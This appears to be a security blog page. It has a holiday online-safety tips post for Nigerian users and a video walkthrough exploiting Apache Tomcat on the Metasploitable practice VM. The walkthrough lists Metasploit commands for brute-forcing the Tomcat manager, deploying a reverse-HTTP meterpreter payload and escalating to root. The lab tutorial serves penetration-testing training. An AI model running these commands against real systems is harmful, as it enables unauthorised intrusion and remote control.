rss
twitter
  •  

Tips to staying safe online this festive season

| Posted in Security Articles |

1

http://3.bp.blogspot.com/-l9xMQ-bpWH8/UFLIYvbJ_uI/AAAAAAAAN68/sM7WDnE95e0/s1600/online+safety.png

The holiday season is upon us and as always, we all are scrambling to get the best deals online and in stores. However, a few wrong clicks this season could land cybercriminals topping your list of people who will be receiving presents this year.

This year has witnessed lots of significant breaches ranging from a $40m cyber-heist by a Nigerian bank IT worker to the huge data leakage at Sony, just about a week ago.

Information Security expert, Rotimi Akinyele of PhynxLabs said online users can easily put themselves and their devices at risk, unless they take precautions and avoid the common mistakes highlighted below that could compromise their security.

 

Beware of the Bank Verification Number (BVN) Scam

The ongoing Bank Verification Number (BVN) introduced by the CBN as a means of uniquely identifying bank customers across the Nigerian Banking industry has provided a fertile ground for cyber criminals to defraud unsuspecting bank customers.

Scam emails purportedly sent from Banks/CBN are in circulation urging bank customers to visit a website to activate their BVN online as failure to do so would result in their account(s) and debit cards being deactivated.

Please note that BVN registration can only be done physically at a bank’s branch. There is no technology now to replace the physical capture of your biometric data which the BVN seeks to achieve.

Do NOT access your accounts from Public WIFi

Just because a WiFi is free doesn’t mean you should connect to it any time it’s available. When you’re banking or making other online payments, it’s better to connect with EDGE or 3G, even if it’s slower. It might only be 45seconds of doing an online bank transaction, but if the wireless network has been compromised, that is more than enough time needed for a cyber-criminal to collect your data.

Use a secure password

It’s crucial to always use strong passwords as passwords are the first line of defense against cyber crooks. Try not to use names of your family, pets, first car, mother’s maiden name, etc. as all these can be easily guessed, brute forced or even available on social media sites like facebook, twitter or instagram. Make sure to use a mixture of characters, numbers, and letters of at least 8 characters when choosing your password; as only this will add a high level of difficulty for any attempted password theft.  Also, do not reuse your passwords as a compromise on one would translate to a compromise on all.

Stay safe on social networking sites

Social media sites are increasingly becoming targets for spams, scams and other online attacks. Asides mining data from tons of “status updates” for targeted attacks, cyber criminals have mastered the act of baiting unsuspecting users with well-crafted short but compelling posts offering free entry to a Christmas competition with a fantastic prize. The general rule is “there is no free lunch or freebies on the internet – if you’re not buying a product then you are the product”. Users who click the links then inadvertently act as accomplices to the cyber-criminals because the malicious scripts would automatically re-post the links, images or videos on their contacts’ walls or timelines. If an offer looks too good to be true, it probably is. Do NOT click.

Protect yourself from fraudulent emails

If you receive an email urging you to download an unknown tax payment attachment or an email informing you of an urgent pending transaction and you need to login with your details to verify, DELETE that email. Such emails usually trick users into visiting the site, and once you do, viruses and spywares get downloaded on your device which automatically joins you to a network of enslaved computers that have been programmed to carry out malicious deeds. No reputable organization would send emails to collect user names, passwords, token keys or Debit/Credit card details.

 

The threats to your online accounts increase daily, however, the tips above can help you stay protected online while still providing the convenience online access offers you this holiday.

Stay safe online and happy holiday!

Rotimi Akinyele is the Chief Security Evangelist at PhynxLabs where he leads the application and Network security competency.

[VIDEO] Gaining Root via the Apache Tomcat Service

| Posted in Security Videos |

0

This video demonstrates how to exploit the Apache tomcat service on Metasploitable. Metasploitable is another vulnerable VM designed to practice penetration testing.

In this video, I will show you how to scan the system, find one of the vulnerable services "Apache Tomcat" and then exploit the service to gain root access.

 

Steps

  • Use Netdiscover to get the IP address of our target (Reconnaisance)
  • Use Nmap to do a detailed scan of the target (Information Gathering)
  • Use Metasploit to brute force the Apache Tomcat Manager login (Gaining Access)
  • Use Metasploit to upload and execute the payload (Remote Access)
  • Use Metasploit to gain root privileges (Privilege Escalation)

Commands

ifconfig
netdiscover -r 192.168.61.0/24
nmap -T Aggressive -sV -v 192.168.61.133
msfconsole
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.61.133
set RPORT 8180
exploit
search tomcat
use exploit/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RHOST 192.168.61.133
set RPORT 8180
set payload java/meterpreter/reverse_http
set LHOST 192.168.61.128
set target 1
exploit
use exploit/linux/local/udev_netlink
sessions -i
set SESSION 1
exploit
id
whoami

 

Notes

  • Song – Bucie feat Heavy K – Easy to Love
  • Video Length – 8minutes

Conclusion

At the end of it all, we were able to get a remote root shell from a vulnerable Apache Tomcat service. In a real world pentest scenario, we would try to explore the machine and retrieve as much sensitive information as possible. We could even use this machine to pivot into the entire Network.

 

Kindly use the comment box below for feedbacks

 

– InfosecShinobi